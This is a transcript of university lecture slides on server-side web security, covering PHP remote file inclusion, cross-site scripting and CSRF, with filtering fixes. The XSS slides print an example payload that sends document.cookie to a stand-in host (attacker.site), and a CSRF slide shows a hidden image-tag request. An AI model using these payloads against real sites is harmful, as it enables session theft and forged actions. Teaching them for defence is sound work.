cosc 4765
DESCRIPTION
Cosc 4765. Server side Web security. Web security issues. From Cenzic Vulnerability report 2014 https://info.cenzic.com/2013-Application-Security-Trends-Report.html. SQL Injections Discussed in another lecture Web Server Configuration and Web server versions Poorly configured systems. - PowerPoint PPT PresentationTRANSCRIPT
![Page 1: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/1.jpg)
Cosc 4765
Server side Web security
![Page 2: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/2.jpg)
Web security issues
From Cenzic Vulnerability report 2014https://info.cenzic.com/2013-Application-Security-Trends-Report.html
![Page 3: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/3.jpg)
• SQL Injections• Discussed in another lecture
• Web Server Configuration and Web server versions– Poorly configured systems.
• Allowing PHP remote file include
– Version allows attackers to look the version to find a vulnerably in the web server.
![Page 4: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/4.jpg)
PHP Remote File Include
• By default, PHP allows file functions to access resources on the Internet using a feature called "allow_url_fopen".
• When PHP scripts allow user input to influence file names, remote file inclusion can be the result.
![Page 5: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/5.jpg)
PHP Remote File Include
• This attack allows (but is not limited to): • Remote code execution
• Remote root kit installation
• On Windows, complete system compromise may be possible through the use of PHP’s SMB file wrappers
• Fixes:– Input validation and sanitizing– Config allow_url_fopen off
• will break apps that rely on this feature, but protect against a very active exploit vector.
![Page 6: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/6.jpg)
• Authentication and Authorization errors– Generally the ability to avoid a required login
screen• Or hack another login normally via XSS or CRSF
• Information leakage.– Data is displayed that is not necessary.
• Example UW used to show your SSN on every page of wyoweb.
– Or displayed on “not protected” pages.• Email address, phone number, etc.• Why is this important?
![Page 7: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/7.jpg)
XSS
• Works by the trust a user has for the site.– Broadly defined as tricking web pages into
displaying web surfer supplied data capable of altering the page for the viewer.
• Most dynamic web pages change to display info for a user, but XSS changes the pages to get information from the viewer, normally cookies and other data.
![Page 8: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/8.jpg)
Some necessary knowledge
• A basic understanding of URL structure
• An understanding of html, JavaScript
• Some understanding of html encoding, http request methods
• web application technologies like ASP, php, etc.
![Page 9: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/9.jpg)
What can XSS do?
• Cookie theft and Account Hijacking– Since XSS executes arbitrary web code on the clients
browser.– Many cookie for older web applications hold all the
information needed to login to an account (“Remember this computer”)
• verification info on the client side, state, and/or credentials
– Allows for Identity theft, accessing confidential resources, pay content, even denial of account services.
![Page 10: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/10.jpg)
What can XSS do? (2)
• User Tracking / Statistics– Able to gain information on sites user’s– Able to monitor their clicks through the
vulnerable site.– Maybe able link users email address to clicks
and interests• good for spammers!
![Page 11: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/11.jpg)
What can XSS do? (3)
• Browser / User exploitation– Possible Examples
• Use the credentials of a site to do what I want– Like using Microsoft site.
– If there is a XSS hole in their site to run my malware.
» Many people would press OK to run code from microsoft.
• High distribution rate and target audience• Don’t exploit the site, just steal the users from the site and
redirect them to another.• Force users into actions onto another site on my behalf but
remove me from the evidence.
![Page 12: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/12.jpg)
What can XSS do? (4)
• Misinformation– dissemination of disinformation
• Since we can possibly rewrite content on web pages
– And of course… SPAM and scams.
![Page 13: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/13.jpg)
How to avoid XSS
• Most of it is avoidable, just like SQL injection and buffer overflow.– but like these, it’s sometimes easier to miss– especially on large and complex web sites.– One big one:
– Turn off error messages on productions web sites.
• How?– Just like Buffer Overflow and SQL injection– Proper filtering on ALL user input data.
![Page 14: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/14.jpg)
Example
• Typical script called welcome.cgi– GET /welcome.cgi?name=Joe%20Hacker
HTTP/1.0– Host: www.vulnerable.site
• Response– <html> <title>Welcome!</title>– Hi Joe Hacker– <BR> Welcome to our system…– </html>
![Page 15: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/15.jpg)
Example abused
• http://www.vulnerable.site/welcome.cgi?name=<script>alert(document.cookie)</scipt>
• Since the link is clicked on the response is:– <HTML> <Title>Welcome!</Title> – Hi <script>alert(document.cookie)</script>– <BR> Welcome to our system ... – </HTML>
Which is executed by the browser
![Page 16: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/16.jpg)
Example abused (2)
• Better example:– http://www.vulnerable.site/welcome.cgi?
name=<script>window.open(“http://www.attacker.site/collect.cgi?cookie=”%2Bdocument.cookie)</script>
• Returns to user– <script>window.open(“http://www.attacker.site/
collect.cgi?cookie=”+document.cookie)</script>
• Open a webpage that gets the cookie info about the vulnerable website.
![Page 17: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/17.jpg)
Preventing XSS
• Don’t just filter dangerous characters
• Filter out everything that is not necessary
• Make sure there is one central function to sanitize everything.– So when it is added to, everything gets it.
![Page 18: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/18.jpg)
Filter Examples
• Perl– Allow A through Z any case, Zero through
Nine, period and dash. Remove everything else.
– $var =~ s/[^a-z0-9 \-.]//ig;
![Page 19: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/19.jpg)
Filter Examples (2)
• PHP– Use stripe_tags or htmlentities functions
• echo htmlentities($name);
– Or use substitition again.• echo preg_replace(‘/[^a-z0-9 .\-]/i,'',$name);
![Page 20: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/20.jpg)
Demo
• In class Demo of how XSS works
![Page 21: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/21.jpg)
Filter output data
• Not the html, but the data.
• similar to filtering input except that you filter characters that are written out to the client – May cause problems with output for dynamic
web pages.• example, <table> would be writing as table
![Page 22: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/22.jpg)
Possible Sources of Malicious Data
• Query String
• Cookies
• Posted data
• URLs and pieces of URLs, such as PATH_INFO
• Data retrieved from users that is persisted in some fashion such as in a database
![Page 23: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/23.jpg)
Cross-site request forgeries (CSRF)
• Works by exploiting the trust that a site has for the user.– Works by specific urls allowing specific actions to
be performed when requested
– Same idea as one-click purchase• http://site/stocks?buy=100&stock=ebay
– Task performed by the user who already logged into the site.
• The browser makes the request, without the user knowledge.
• Can be done with XXS.
![Page 24: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/24.jpg)
Example CSRF• HTML Methods
– IMG SRC <img src="http://host/?command">
– SCRIPT SRC <script src="http://host/?command">
– IFRAME SRC <iframe src="http://host/?command">
• JavaScript Methods <script> var foo = new Image(); foo.src = "http://host/?command"; </script>
• Example code:– <img src="http://example.com/add_to_db.php? name=cheap
%20rolex&[email protected]&comment=mortgage%20help&optin=yes" width="1" height="1">
![Page 25: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/25.jpg)
Major hacks with CSRF
• A vulnerability in GMail was discovered in January 2007 which allowed a attacker to steal a GMail user's contact list.
• A different issue was discovered in Netflix which allowed an attacker to change the name and address on the account, as well as add movies to the rental queue etc...
![Page 26: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/26.jpg)
Fixes for CSRF
• A user should always have to login.– No “Remember ME” or something of that sort,
which is based on a cookie logoin.– Short session periods (maybe 5 minutes) can
also reduce the odds of successful attacks.
• Adding a session token to each request– But XXS can get around this by sniffing the
session token.
![Page 27: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/27.jpg)
Tools
• The list is older, maybe still useful– http://projects.webappsec.org/w/page/132469
88/Web%20Application%20Security%20Scanner%20List
– From http://samate.nist.gov/index.php/Web_Application_Vulnerability_Scanners.html#Web_Applications_Issues
• Source code scanners– http://samate.nist.gov/index.php/Source_Cod
e_Security_Analyzers.html
![Page 28: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/28.jpg)
References
• http://coding.smashingmagazine.com/2010/01/14/web-security-primer-are-you-part-of-the-problem/
• http://www.cert.org/advisories/CA-2000-02.html • HOWTO: Prevent Cross-Site Scripting Security
Issues http://www.megasecurity.org/Info/CSS_prevent.html
• Cross Site Scripting Scanning ("XSSS") http://www.sven.de/xsss/
• http://en.wikipedia.org/wiki/Cross_site_scripting• http://ha.ckers.org/xss.html • http://www.sans.org/ • http://www.cgisecurity.com/articles/csrf-faq.shtml
![Page 29: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/29.jpg)
QA&